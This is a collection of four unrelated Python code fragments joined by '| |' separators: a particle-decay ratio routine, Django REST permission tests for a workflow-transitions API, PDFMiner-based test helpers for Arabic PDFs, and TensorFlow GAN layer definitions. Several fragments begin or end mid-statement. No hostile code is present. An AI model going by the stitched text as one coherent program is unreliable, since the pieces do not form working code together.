decays[i]['path'], p_str)
else:
#skip computation if all possibility are ruled out.
values[i] = 0
#check if the ratio is constant for all possibilities
for i in range(len(decays)):
for j in range(i+1, len(decays)):
if values[i] == 0 or values[j] == 0 or valid[(i,j)] == 0:
continue # already not valid
elif valid[(i,j)] is True:
valid[(i,j)] = values[j]/values[i]
valid[(j,i)] = valid[(i,j)]
elif (valid[(i,j)] - values[j]/values[i]) < 1e-6 * (valid[(i,j)] + values[j]/values[i]):
pass
else:
valid[(i, j)] = 0
valid[(j, i)] = 0
if __debug__:
for i in range(len(decays)):
comment= "| "
for j in range(len(decays)):
if i == j:
comment+= "%4e " % 1
continue
comment+= "%4e " % valid[(i,j)]
comment+= "|"+ os.path.basename(decays[i]['path'])
logger.debug(comment)
# store the result in the relation object. (using tag as key)
for i in range(len(decays)):
tag_i = decays[i]['tag'][2:]
for j in range(i+1, len(decays)):
tag_j = decays[j]['tag'][2:]
if valid[(i,j)] and tag_j not in relation:
relation[tag_j] = (tag_i, valid[(i,j)])
# fullfill the object with the already identify to one decay.
#and add those who doesn't have any relations.
for decay in self.all_decay.values():
tags = [m.shell_string(pdg_order=True)[2:] for m in decay['processes']]
init_tag = tags[0]
if init_tag not in relation:
out = (init_tag, 1)
else:
out = relation[init_tag]
for tag in tags[1:]:
relation[tag] = out
decay_mapping = self.get_process_identical_ratio(relation)
logger.info('Done in %ss' % (time.time()-start))
return decay_mapping
def get_process_identical_ratio(self, relation):
# Now that we have ratio relation between each tag, we need to say
#what is the relation between the decay of the production process.
#This is not only the product since some decay can be equivalent.
decay_mapping = {} # final output: {first_process: [(equiv_proc, ratio), ...]
tag2real = {} # basic tag [the one related via relation] -> first process
# basic tag ratio doesn't have any identical factor (this simplify calculation)
nb=0
for prod in self.all_ME.values():
for decay in prod['decays']:
tag = decay['decay_tag']
nb+=1
# build the basic tag (all equiv process are related to this tag)
basic_tag = []
ratio = 1
for t in tag:
if | |
<gh_stars>0
from typing import Any, Dict, List, Optional, Tuple, cast
import uuid
from urllib.parse import quote
from django.contrib.auth.models import User
from processes.models import (
RunEnvironment, Workflow, WorkflowTransition, UserGroupAccessLevel
)
from processes.serializers import (
WorkflowTransitionSerializer
)
import pytest
from rest_framework.test import APIClient
from moto import mock_ecs, mock_sts, mock_events
from conftest import *
def ensure_serialized_workflow_transition_valid(response_workflow_transition: Dict[str, Any],
workflow_transition: WorkflowTransition, user: User,
group_access_level: int,
api_key_access_level: Optional[int] = None,
api_key_run_environment: Optional[RunEnvironment] = None) -> None:
context = context_with_authenticated_request(user=user,
group=workflow_transition.workflow.created_by_group,
api_key_access_level=api_key_access_level,
api_key_run_environment=api_key_run_environment)
access_level = group_access_level
if api_key_access_level is not None:
access_level = min(access_level, api_key_access_level)
assert response_workflow_transition == WorkflowTransitionSerializer(
workflow_transition, context=context).data
if api_key_run_environment:
assert api_key_run_environment.pk == workflow_transition.workflow.run_environment.pk
@pytest.mark.django_db
@pytest.mark.parametrize("""
is_authenticated, group_access_level,
api_key_access_level, api_key_scope_type,
user_has_another_group, send_group_id_type, send_workflow_uuid_type,
status_code, expected_indices
""", [
# Admin with Admin API key, explicit group succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
False, SEND_ID_CORRECT, SEND_ID_NONE,
200, [0, 1]),
# Admin with Admin API key, no explicit group succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
False, SEND_ID_NONE, SEND_ID_NONE,
200, [0, 1]),
# Observer with JWT token, explicit group succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
None, None,
False, SEND_ID_CORRECT, SEND_ID_NONE,
200, [0, 1]),
# Observer in single group with JWT token, no explicit group succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
None, None,
False, SEND_ID_NONE, SEND_ID_NONE,
200, [0, 1]),
# Admin in multiple groups with JWT token, no explicit group yields 400
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
True, SEND_ID_NONE, SEND_ID_NONE,
400, None),
# Developer in multiple groups with JWT token, explicit group yields 200
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
None, None,
True, SEND_ID_CORRECT, SEND_ID_NONE,
200, [0, 1]),
# Support user in multiple groups with JWT token, explicit Workflow yields 200
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
None, None,
True, SEND_ID_NONE, SEND_ID_CORRECT,
200, [0]),
# Admin with Observer API key, explicit group succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, None,
False, SEND_ID_CORRECT, SEND_ID_NONE,
200, [0, 1]),
# Admin with multiple groups with Observer API key succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, None,
True, SEND_ID_CORRECT, SEND_ID_NONE,
200, [0, 1]),
# No API key with no explicit group in request yields 400
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
None, None,
True, SEND_ID_NONE, SEND_ID_NONE,
400, None),
# API key with no explicit group in request succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, None,
True, SEND_ID_NONE, SEND_ID_NONE,
200, [0, 1]),
# Admin with Admin API key, explicit wrong group yields 422
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
False, SEND_ID_WRONG, SEND_ID_NONE,
422, None),
# Admin using JWT, explicit wrong group yields 422
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
False, SEND_ID_WRONG, SEND_ID_NONE,
422, None),
# Admin using Admin API key, explicit bad group ID yields 422
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
False, SEND_ID_NOT_FOUND, SEND_ID_NONE,
422, None),
# Admin using JWT, explicit bad group ID yields 422
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
False, SEND_ID_NOT_FOUND, SEND_ID_NONE,
422, None),
# Admin with Admin API key scoped to correct Run Environment, explicit group finds the desired one
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_CORRECT,
False, SEND_ID_CORRECT, SEND_ID_NONE,
200, [0]),
# No authentication yields 401
(False, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
False, SEND_ID_CORRECT, SEND_ID_NONE,
401, None),
# TODO: check filtering, non-default ordering
])
@mock_ecs
@mock_sts
@mock_events
def test_workflow_transition_list(
is_authenticated: bool, group_access_level: Optional[int],
api_key_access_level: Optional[int], api_key_scope_type: str,
user_has_another_group: bool, send_group_id_type: str,
send_workflow_uuid_type: str,
status_code: int, expected_indices: List[int],
user_factory, group_factory, run_environment_factory,
workflow_factory, workflow_task_instance_factory, task_factory,
workflow_transition_factory, api_client) -> None:
user = user_factory()
group = user.groups.first()
set_group_access_level(user=user, group=group,
access_level=group_access_level)
another_group = group_factory()
if user_has_another_group:
set_group_access_level(user=user, group=another_group,
access_level=UserGroupAccessLevel.ACCESS_LEVEL_ADMIN)
workflow_group = group
production_run_environment = run_environment_factory(created_by_group=workflow_group)
production_workflow = workflow_factory(created_by_group=workflow_group,
run_environment=production_run_environment)
production_from_wti = workflow_task_instance_factory(workflow=production_workflow,
task=task_factory(run_environment=production_run_environment,
created_by_group=workflow_group))
production_to_wti = workflow_task_instance_factory(workflow=production_workflow,
task=task_factory(run_environment=production_run_environment,
created_by_group=workflow_group))
test_run_environment = run_environment_factory(created_by_group=workflow_group)
test_workflow = workflow_factory(created_by_group=workflow_group,
run_environment=test_run_environment)
test_from_wti = workflow_task_instance_factory(workflow=test_workflow,
task=task_factory(run_environment=test_run_environment,
created_by_group=workflow_group))
test_to_wti = workflow_task_instance_factory(workflow=test_workflow,
task=task_factory(run_environment=test_run_environment,
created_by_group=workflow_group))
workflow_transitions = sorted([
workflow_transition_factory(from_workflow_task_instance=test_from_wti,
to_workflow_task_instance=test_to_wti),
workflow_transition_factory(from_workflow_task_instance=production_from_wti,
to_workflow_task_instance=production_to_wti),
], key=lambda wt: str(wt.uuid))
api_key_run_environment = None
if api_key_scope_type == SCOPE_TYPE_CORRECT:
api_key_run_environment = workflow_transitions[0].to_workflow_task_instance.workflow.run_environment
elif api_key_scope_type == SCOPE_TYPE_OTHER:
api_key_run_environment = workflow_transitions[1].to_workflow_task_instance.workflow.run_environment
client = make_api_client_from_options(api_client=api_client,
is_authenticated=is_authenticated, user=user, group=group,
api_key_access_level=api_key_access_level,
api_key_run_environment=api_key_run_environment)
params = {}
group_id: Optional[str] = None
if send_group_id_type == SEND_ID_CORRECT:
group_id = str(group.id)
elif send_group_id_type == SEND_ID_NOT_FOUND:
group_id = '666'
elif send_group_id_type == SEND_ID_WRONG:
group_id = str(another_group.id)
if group_id:
params['workflow__created_by_group__id'] = group_id
workflow_uuid: Optional[str] = None
if send_workflow_uuid_type == SEND_ID_CORRECT:
workflow_uuid = str(workflow_transitions[0].workflow.uuid)
elif send_workflow_uuid_type == SEND_ID_NOT_FOUND:
workflow_uuid = 'abc'
if workflow_uuid:
params['workflow__uuid'] = workflow_uuid
response = client.get('/api/v1/workflow_transitions/', params)
assert response.status_code == status_code
if status_code == 200:
assert group_access_level is not None
page = response.data
assert page['count'] == len(expected_indices)
results = page['results']
for i in expected_indices:
response_workflow_transition = results[i]
target_workflow_transition = workflow_transitions[expected_indices[i]]
ensure_serialized_workflow_transition_valid(response_workflow_transition,
workflow_transition=target_workflow_transition, user=user,
group_access_level=group_access_level,
api_key_access_level=api_key_access_level,
api_key_run_environment=api_key_run_environment)
def common_setup(is_authenticated: bool, group_access_level: Optional[int],
api_key_access_level: Optional[int], api_key_scope_type: str,
uuid_send_type: str, existing_has_run_environment: bool,
create_existing: bool,
user, group_factory, run_environment_factory,
workflow_factory, workflow_task_instance_factory, task_factory,
workflow_transition_factory, api_client) \
-> Tuple[Optional[WorkflowTransition], Workflow, Optional[RunEnvironment], APIClient, str]:
group = user.groups.first()
if group_access_level is not None:
set_group_access_level(user=user, group=group,
access_level=group_access_level)
workflow_transition_group = group
workflow_run_environment = None
if existing_has_run_environment:
workflow_run_environment = run_environment_factory(
created_by_group=workflow_transition_group)
another_run_environment = run_environment_factory(created_by_group=workflow_transition_group)
workflow = workflow_factory(created_by_group=group, run_environment=workflow_run_environment)
from_wti = workflow_task_instance_factory(workflow=workflow)
to_wti = workflow_task_instance_factory(workflow=workflow)
workflow_transition: Optional[WorkflowTransition] = None
if create_existing:
workflow_transition = workflow_transition_factory(
from_workflow_task_instance=from_wti,
to_workflow_task_instance=to_wti)
api_key_run_environment = None
if api_key_scope_type == SCOPE_TYPE_CORRECT:
api_key_run_environment = workflow_run_environment
elif api_key_scope_type == SCOPE_TYPE_OTHER:
api_key_run_environment = another_run_environment
client = make_api_client_from_options(api_client=api_client,
is_authenticated=is_authenticated, user=user, group=group,
api_key_access_level=api_key_access_level,
api_key_run_environment=api_key_run_environment)
url = '/api/v1/workflow_transitions/'
if uuid_send_type != SEND_ID_NONE:
workflow_transition_uuid = uuid.uuid4()
if uuid_send_type == SEND_ID_CORRECT:
workflow_transition_uuid = cast(WorkflowTransition, workflow_transition).uuid
elif uuid_send_type == SEND_ID_IN_WRONG_GROUP:
another_group = group_factory()
set_group_access_level(user=user, group=another_group,
access_level=UserGroupAccessLevel.ACCESS_LEVEL_ADMIN)
workflow_in_other_group = workflow_factory(created_by_group=another_group)
from_wti_in_other_group = workflow_task_instance_factory(
workflow=workflow_in_other_group,
task=task_factory(created_by_group=another_group))
to_wti_in_other_group = workflow_task_instance_factory(
workflow=workflow_in_other_group,
task=task_factory(created_by_group=another_group))
workflow_transition_in_other_group = workflow_transition_factory(
from_workflow_task_instance=from_wti_in_other_group,
to_workflow_task_instance=to_wti_in_other_group)
workflow_transition_uuid = workflow_transition_in_other_group.uuid
url += quote(str(workflow_transition_uuid)) + '/'
return (workflow_transition, workflow, api_key_run_environment, client, url)
def make_request_body(uuid_send_type: Optional[str],
wti_send_type: Optional[str],
for_from_wti: bool,
user: User,
api_key_run_environment: Optional[RunEnvironment],
workflow_transition: Optional[WorkflowTransition],
workflow: Workflow,
group_factory, run_environment_factory, workflow_factory,
workflow_task_instance_factory, task_factory,
workflow_transition_factory) -> Dict[str, Any]:
request_data: Dict[str, Any] = {
'rule_type': WorkflowTransition.RULE_TYPE_ON_SUCCESS
}
if uuid_send_type == SEND_ID_NOT_FOUND:
request_data['uuid'] = str(uuid.uuid4())
elif uuid_send_type == SEND_ID_CORRECT:
request_data['uuid'] = str(cast(WorkflowTransition, workflow_transition).uuid)
elif uuid_send_type == SEND_ID_WRONG:
another_workflow_transition = workflow_transition_factory()
request_data['uuid'] = str(another_workflow_transition.uuid)
good_wti_prefix = 'to' if for_from_wti else 'from'
varying_wti_prefix = 'from' if for_from_wti else 'to'
varying_task_run_environment: Optional[RunEnvironment] = None
workflow_run_environment = workflow.run_environment
varying_task_run_environment = workflow_run_environment
group = workflow.created_by_group
good_task = task_factory(
created_by_group=group,
run_environment=varying_task_run_environment)
good_wti = workflow_task_instance_factory(workflow=workflow,
task=good_task)
request_data[f'{good_wti_prefix}_workflow_task_instance'] = {
'uuid': str(good_wti.uuid)
}
if wti_send_type is None:
pass
else:
if wti_send_type == SEND_ID_NONE:
request_data[f'{varying_wti_prefix}_workflow_task_instance'] = None
else:
if wti_send_type == SEND_ID_CORRECT:
if api_key_run_environment:
workflow_run_environment = api_key_run_environment
elif wti_send_type == SEND_ID_WRONG:
workflow = workflow_factory()
elif wti_send_type == SEND_ID_WITH_OTHER_RUN_ENVIRONMENT:
workflow_run_environment = run_environment_factory(created_by_group=user.groups.first())
workflow = workflow_factory(run_environment=workflow_run_environment,
created_by_group=group)
elif wti_send_type == SEND_ID_IN_WRONG_GROUP:
group = group_factory()
set_group_access_level(user=user, group=group,
access_level=UserGroupAccessLevel.ACCESS_LEVEL_ADMIN)
workflow_run_environment = run_environment_factory(created_by_group=group)
workflow = workflow_factory(run_environment=workflow_run_environment,
created_by_group=group)
varying_task_group = group
varying_task_run_environment = workflow_run_environment or \
run_environment_factory(created_by_group=varying_task_group)
varying_task = task_factory(
created_by_group=varying_task_run_environment.created_by_group,
run_environment=varying_task_run_environment)
if wti_send_type and (wti_send_type != SEND_ID_NONE):
varying_wti = workflow_task_instance_factory(workflow=workflow, task=varying_task)
request_data[f'{varying_wti_prefix}_workflow_task_instance'] = {
'uuid': str(varying_wti.uuid)
}
print(f"{request_data=}")
return request_data
@pytest.mark.django_db
@pytest.mark.parametrize("""
is_authenticated, group_access_level,
api_key_access_level, api_key_scope_type,
uuid_send_type,
status_code
""", [
# Admin with API Key succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Developer with API Key succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Developer with API Key succeeds with unscoped Alert Method
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Observer with API Key succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Admin with API Key with support access succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_SUPPORT, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Admin with JWT token succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
SEND_ID_CORRECT,
200),
# Developer with JWT token succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
None, None,
SEND_ID_CORRECT,
200),
# Observer with JWT token succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
None, None,
SEND_ID_CORRECT,
200),
# Developer with developer API key scoped to correct Run Environment,
# explicit group finds the desired one
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_CORRECT,
SEND_ID_CORRECT,
200),
# Developer with developer API key scoped to different Run Environment gets 404
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_OTHER,
SEND_ID_CORRECT,
404),
# Admin with API Key, wrong UUID gets 404
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_NONE,
SEND_ID_NOT_FOUND,
404),
# Admin with API Key with wrong group gets 404
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_NONE,
SEND_ID_IN_WRONG_GROUP,
404),
# No authentication yields 401
(False, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
None, None,
SEND_ID_CORRECT,
401),
])
@mock_ecs
@mock_sts
@mock_events
def test_workflow_transition_fetch(
is_authenticated: bool, group_access_level: Optional[int],
api_key_access_level: Optional[int],
api_key_scope_type: str,
uuid_send_type: str,
status_code: int,
user_factory, group_factory, run_environment_factory, workflow_factory,
workflow_task_instance_factory, task_factory,
workflow_transition_factory, api_client) -> None:
user = user_factory()
workflow_transition, _workflow, api_key_run_environment, client, url = common_setup(
is_authenticated=is_authenticated,
group_access_level=group_access_level,
api_key_access_level=api_key_access_level,
api_key_scope_type=api_key_scope_type,
uuid_send_type=uuid_send_type,
existing_has_run_environment=True,
create_existing=True,
user=user,
group_factory=group_factory,
run_environment_factory=run_environment_factory,
workflow_factory=workflow_factory,
workflow_task_instance_factory=workflow_task_instance_factory,
task_factory=task_factory,
workflow_transition_factory=workflow_transition_factory,
api_client=api_client)
response = client.get(url)
assert response.status_code == status_code
if status_code == 200:
assert group_access_level is not None
ensure_serialized_workflow_transition_valid(response_workflow_transition=response.data,
workflow_transition=cast(WorkflowTransition, workflow_transition),
user=user,
group_access_level=group_access_level,
api_key_access_level=api_key_access_level,
| |
# -*- coding: utf-8 -*-
# Python imports
import io
import collections
import random
import os
import re
import sys
import time
from lxml import etree
# 3rd party imports
from pdfminer.pdfpage import PDFPage
from pdfminer.pdfinterp import PDFResourceManager
from pdfminer.pdfinterp import PDFPageInterpreter
from pdfminer.converter import XMLConverter
from pdfminer.layout import LAParams
# Project imports
# Importing pdf_canvas registers the fonts that the PDF will use.
import rollgen.pdf_canvas # noqa
from ..utils import is_iterable
# Our PDFs use only Amiri-Regular and Amiri-Bold
EXPECTED_FONTS = ('Amiri-Regular', 'Amiri-Bold',)
ALEF_CANONICAL = '\u0627'
ALEF_ISOLATED = '\ufe8d'
NBSP = '\u00a0'
# Diacritics that need to be handled in swap_diacritics() (q.v.).
KASRA = '\u0650'
SHADDA = '\u0651'
FATHA = '\u064e'
DAMMA = '\u064f'
DIACRITIC_SWAP_REGEX = '(.[{}])'.format(''.join((KASRA, SHADDA, FATHA, DAMMA)))
DIACRITIC_SWAP_REGEX = re.compile(DIACRITIC_SWAP_REGEX, re.IGNORECASE)
# I use an explicit random seed so that if there's a bug in this run I can reproduce the
# bug by temporarily hardcoding the seed. I make the seed an int because floats are imperfectly
# represented by print, and I can't re-use the seed if I don't have an exact representation of it.
seed = int(time.time())
random.seed(seed)
# Writing to stderr ensures that if a test fails on Travis, the seed will be visible in Travis' log.
sys.stderr.write("seed is {}\n".format(seed))
def parse_bbox(bbox):
"""Given PDFMiner bbox info as a comma-delimited string, return it as a list of floats."""
return list(map(float, bbox.split(',')))
def unwrap_lines(lines, index):
"""Combine the two lines at lines[index] and lines[index + 1].
The actual lines extracted from the PDF sometimes contain long center and subcon names that
have wrapped onto the following line. In most cases (generally on cover pages), that's not
an error.
However, my test code that builds the list of expected lines can't predict how and where the
PDF layout algorithm will wrap a long name, so it always comes as somewhat of a surprise.
It's easier to unwrap the actual lines than it is to figure out where to wrap the expected
lines, and that's what this code does.
"""
return lines[:index] + [lines[index + 1] + ' ' + lines[index]] + lines[index + 2:]
def clean_font_name(font_name):
"""Given a font name from PDFMiner's XML, return the font name with the "AAAAAA+" prefix
removed (if present).
"""
# For some reason font names have "AAAAAA+" or similar prepended, e.g. AAAAAA+Arial-BoldMT.
# I've googled around but can't figure out the significance of this stuff.
return font_name.split('+')[1] if ('+' in font_name) else font_name
def clean_textlines(textlines):
"""Given a list of textlines as from extract_textlines(), return a list of simple strings
representing those textlines. Some artifacts of the text->PDF->text roundtrip are scrubbed.
"""
lines = []
for text_elements in textlines:
line = ''.join([text_element.text for text_element in text_elements])
line = normalize_alef(line)
line = swap_diacritics(line)
lines.append(line)
return lines
def extract_pdf_page(filename, page_number_or_numbers):
"""Given the name of a PDF file and the pages to extract, use PDFMiner to extract those
pages and return them as XML (in utf-8 bytes).
The param page_number_or_numbers can be a single page number or an iterable thereof.
"""
# This code adapted from pdf2txt.py which is part of PDFMiner.
# Here's the command line version of the code below --
# pdf2txt.py -p 1 -o expected.xml sample.pdf
if is_iterable(page_number_or_numbers):
page_numbers = page_number_or_numbers
else:
page_numbers = [page_number_or_numbers]
f_out = io.BytesIO()
laparams = LAParams()
rsrcmgr = PDFResourceManager()
device = XMLConverter(rsrcmgr, f_out, codec='utf-8', laparams=laparams)
with open(filename, 'rb') as f_in:
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages(f_in, page_numbers):
interpreter.process_page(page)
device.close()
xml = f_out.getvalue()
f_out.close()
return xml
def extract_textlines(xml):
"""Given XML (in bytes) output from PDFMiner, return a list of lists. The inner lists
contain PDFMiner <text> elements (one character each) representing one line of text. The text
elements are ordered as they appear left-to-right on the page. The inner lists themselves are
sorted in the order that they appear top to bottom on the page.
"""
# The text in PDFMiner's output is organized in <textline> elements which contain a bunch
# of <text> elements. The <text> elements contain one character each. Both <textline> and
# <text> elements have a bbox attr.
#
# Within a given textline, the ordering of the text subelements matches the left-to-right order
# of the elements on the visible page.
#
# One might hope that the textline elements would appear in the XML in the same top-to-bottom
# order that they appear on the visible page, but one so wishing would be disappointed. The
# textline elements are not ordered in any obvious way.
#
# Furthermore, don't assume too much about what PDFMiner considers a "line". It seems logical
# to me that if a set of text elements has the same y0/y1 values in their bbox attrs, they
# would be contained in the same textline element. In practice, sometimes they are, and
# sometimes they aren't.
#
# Perhaps that's because PDF permits layout where characters overlap horizontally and/or
# vertically, and in that context it can be pretty difficult to decide what constitutes a
# "line". Even our PDFs exhibit character overlap, because (for example) some Arabic letters
# are represented in Unicode decomposed form. Decomposed form is diacritic + letter instead of
# just the single (normalized) Unicode character that represents the two combined.
# e.g. 0x654 + 0x627 (hamza + alef) versus 0x623 (Alef with hamza above)).
#
# The practical upshot is that we have to assemble the lines ourselves.
# More info --
# The bbox value is (x0,y0,x1,y1).
#
# x0: the distance from the left of the page to the left edge of the box.
# y0: the distance from the bottom of the page to the lower edge of the box.
# x1: the distance from the left of the page to the right edge of the box.
# y1: the distance from the bottom of the page to the upper edge of the box.
#
# Remember in PDF the page origin is the *bottom left corner*.
# So the bottom left is (0,0) and the top right corner is
# somewhere like (612,792) in the case of A4 paper.
#
# Quoted from: https://groups.google.com/d/msg/pdfminer-users/wOvDSW23B4M/4fAWUhnrjO8J
# My algorithm for constructing lines is as follows --
# Ignore the textline elements and throw all the text elements into a bucket
# Group them by bbox.y1
# Within each group, sort by (bbox.x0, bbox.x1)
# Sorting by bbox.x0 alone is not sufficient when dealing with diacritics.
root = etree.fromstring(xml)
text_elements = root.xpath('.//text')
# The dict lines_by_y_value groups text elements by bbox.y1 (they are the dict keys). Each
# value in the dict is an unsorted list of 2-tuples of (text element, (bbox.x0, bbox.x1)).
lines_by_y_value = collections.defaultdict(list)
for text_element in text_elements:
bbox = text_element.get('bbox')
if bbox:
x0, y0, x1, y1 = parse_bbox(text_element.get('bbox'))
lines_by_y_value[y1].append((text_element, (x0, x1)))
# else:
# Some text elements (e.g. newlines) have no bbox info. I discard them.
# Sort top to bottom
y_values = sorted(lines_by_y_value.keys(), reverse=True)
# Turn the dict into a sorted list of sorted lists.
lines = []
for y_value in y_values:
line = lines_by_y_value[y_value]
# Sort left-to-right
line = sorted(line, key=lambda item: item[1])
# I'm done with the bbox info so I can discard it now.
line = [item[0] for item in line]
lines.append(line)
return lines
def extract_line_lengths(xml):
"""Given Unicode XML from PDFMiner, return a list of string lengths.
The lengths are ordered in the same order as the strings in the PDF (first page to last,
top to bottom of each page). The length unit (e.g. mm, em, inch, etc.) is whatever Reportlab
uses as its default. The values are all in the same unit so they're comparable to one another.
"""
lines = extract_textlines(xml)
line_lengths = []
for line in lines:
# Each line is a list of PDFMiner <text> elements (one character each). I don't care
# about the text, just the bbox info.
character_bboxes = [parse_bbox(text_element.get('bbox')) for text_element in line]
# length = (x1 of the last character) - (x0 of the first).
line_lengths.append(character_bboxes[-1][2] - character_bboxes[0][0])
return line_lengths
def _get_random_words(filename, n_words):
"""Given a # | |
import tensorflow as tf
##################################################################################
# Initialization
##################################################################################
# Xavier : tf_contrib.layers.xavier_initializer()
# He : tf_contrib.layers.variance_scaling_initializer()
# Normal : tf.random_normal_initializer(mean=0.0, stddev=0.02)
# Truncated_normal : tf.truncated_normal_initializer(mean=0.0, stddev=0.02)
# Orthogonal : tf.orthogonal_initializer(1.0) / relu = sqrt(2), the others = 1.0
weight_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.02)
gan_dtype = tf.float32
from utils import round_up
##################################################################################
# Layer
##################################################################################
def subpixel_conv(x, channels, opt, kernel=3, scale=2, use_bias=True, scope='subpixel_conv_0'):
r2 = scale*scale
x = conv(x, channels * r2, opt=opt, kernel=kernel, stride=1, use_bias=use_bias, pad=(kernel-1)/2.0, scope=scope)
x = tf.nn.depth_to_space(x, block_size=scale)
return x
def decode_kernel_sizes(str):
parts = str.split(',')
slices = []
sum = 0
for part in parts:
size, kernel_size = part.split('x')
slices+=[{"size": int(size), "kernel": int(kernel_size)}]
sum+=int(size)
ret = {}
ret["slices"] = slices
ret["total_channels"] = sum
return ret
def encode_kernel_sizes(slices, ch_mul=1.0):
return ",".join([str(int(float(slice["size"])*ch_mul+0.00000001))+"x"+str(slice["kernel"]) for slice in slices])
def conv(x, channels, opt, kernel=4, stride=2, pad=0, dilation=1, use_bias=True, scope='conv_0'):
with tf.variable_scope(scope) as full_scope:
if isinstance(kernel, str):
slices = decode_kernel_sizes(kernel)["slices"]
slice_convs = []
for slice in slices:
slice_conv = conv(x, slice["size"], opt, kernel=slice["kernel"], stride=stride, pad=(slice["kernel"]-1)//2, dilation=dilation, use_bias=use_bias, scope='conv'+str(slice["kernel"])+"_slice")
slice_convs += [slice_conv]
return tf.concat(slice_convs, axis=-1)
tf_pad_type = 'VALID'
if pad > 0:
pad_type = opt.get("conv", {}).get("padding_type", 'reflect')
h = x.get_shape().as_list()[1]
if h % stride == 0:
pad = pad * 2
else:
pad = max(kernel - (h % stride), 0)
pad_top = int(pad//2)
pad_bottom = int(pad - pad_top)
pad_left = int(pad//2)
pad_right = int(pad - pad_left)
if pad_type == 'zero':
tf_pad_type = 'SAME'
elif pad_type == 'reflect':
x = tf.pad(x, [[0, 0], [pad_top, pad_bottom], [pad_left, pad_right], [0, 0]], mode='REFLECT')
else:
raise ValueError("Unsupported padding type: "+str(pad_type))
if opt.get("conv", {}).get("sn", True):
if 'generator' in full_scope.name:
w = tf.get_variable("kernel", shape=[kernel, kernel, x.get_shape()[-1], channels], initializer=weight_init,
regularizer=opt.get("conv", {}).get("regularizer", None), dtype=gan_dtype)
else :
w = tf.get_variable("kernel", shape=[kernel, kernel, x.get_shape()[-1], channels], initializer=weight_init,
regularizer=None, dtype=gan_dtype)
x = tf.nn.conv2d(input=x, filter=spectral_norm(w),
strides=[1, stride, stride, 1], padding=tf_pad_type, dilations=dilation)
if use_bias :
bias = tf.get_variable("bias", [channels], initializer=tf.constant_initializer(0.0), dtype=gan_dtype)
x = tf.nn.bias_add(x, bias)
else :
if 'generator' in full_scope.name:
x = tf.layers.conv2d(inputs=x, filters=channels,
kernel_size=kernel, kernel_initializer=weight_init,
kernel_regularizer=opt.get("conv", {}).get("regularizer", None),
strides=stride, use_bias=use_bias, dilations=dilation)
else :
x = tf.layers.conv2d(inputs=x, filters=channels,
kernel_size=kernel, kernel_initializer=weight_init,
kernel_regularizer=None,
strides=stride, use_bias=use_bias, dilations=dilation)
return x
def deconv(x, channels, opt, kernel=4, stride=2, padding='SAME', use_bias=True, scope='deconv_0'):
with tf.variable_scope(scope):
x_shape = x.get_shape().as_list()
if padding == 'SAME':
output_shape = [x_shape[0], x_shape[1] * stride, x_shape[2] * stride, channels]
else:
output_shape = [x_shape[0], x_shape[1] * stride + max(kernel - stride, 0), x_shape[2] * stride + max(kernel - stride, 0), channels]
if opt.get("conv", {}).get("sn", True):
